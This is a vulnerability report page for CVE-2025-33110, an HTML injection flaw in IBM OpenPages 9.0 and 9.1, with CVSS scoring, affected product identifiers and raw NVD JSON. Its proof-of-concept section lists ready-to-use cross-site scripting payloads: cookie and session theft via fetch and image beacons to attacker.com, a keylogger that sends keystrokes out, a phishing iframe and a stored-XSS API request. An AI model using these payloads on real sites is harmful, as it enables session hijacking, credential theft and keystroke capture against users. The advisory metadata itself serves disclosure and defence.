Security Vulnerability Report
CVE-2025-33110 CVSS 5.4 MEDIUM

Published: 2025-11-06 21:15:42
Last Modified: 2025-11-24 15:27:57

Description

IBM OpenPages 9.1, and 9.0 with Watson is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:openpages:9.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:openpages:9.1.0:*:*:*:*:*:*:* - VULNERABLE
IBM OpenPages 9.1
IBM OpenPages 9.0 with Watson

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-33110 HTML Injection PoC -->
<!-- Target: IBM OpenPages 9.0/9.1 -->
<!-- This PoC demonstrates HTML injection in user input fields -->

<!-- Basic HTML Injection Payload -->
<script>alert('XSS - CVE-2025-33110')</script>

<!-- Cookie Stealing Payload -->
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

<!-- Session Hijacking Payload -->
<script>
document.write('<img src="https://attacker.com/log?cookie='+document.cookie+'&url='+window.location.href+'">');
</script>

<!-- Phishing Payload -->
<iframe src="https://attacker.com/fake-login.html" width="100%" height="100%"></iframe>

<!-- Keylogger Payload -->
<script>
document.onkeypress=function(e){
  fetch('https://attacker.com/log?key='+e.key);
}
</script>

<!-- Image Tag Bypass Payload -->
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">

<!-- SVG Payload -->
<svg onload="fetch('https://attacker.com/exfil?data='+document.cookie)">

<!-- Stored XSS via API -->
<!-- POST /api/submit-data HTTP/1.1 -->
<!-- Content-Type: application/json -->
<!-- {"field": "<script>alert(document.domain)</script>"} -->

References

https://www.ibm.com/support/pages/node/7250321 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-33110", "sourceIdentifier": "[email protected]", "published": "2025-11-06T21:15:42.157", "lastModified": "2025-11-24T15:27:56.667", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM OpenPages 9.1, and 9.0 with Watson is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:openpages:9.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "F8ACBB76-355D-43F6-851E-0B79EE52AC19"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:openpages:9.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F78E4CFE-31E7-4FFF-8DB4-6D7AC69A2248"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7250321", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}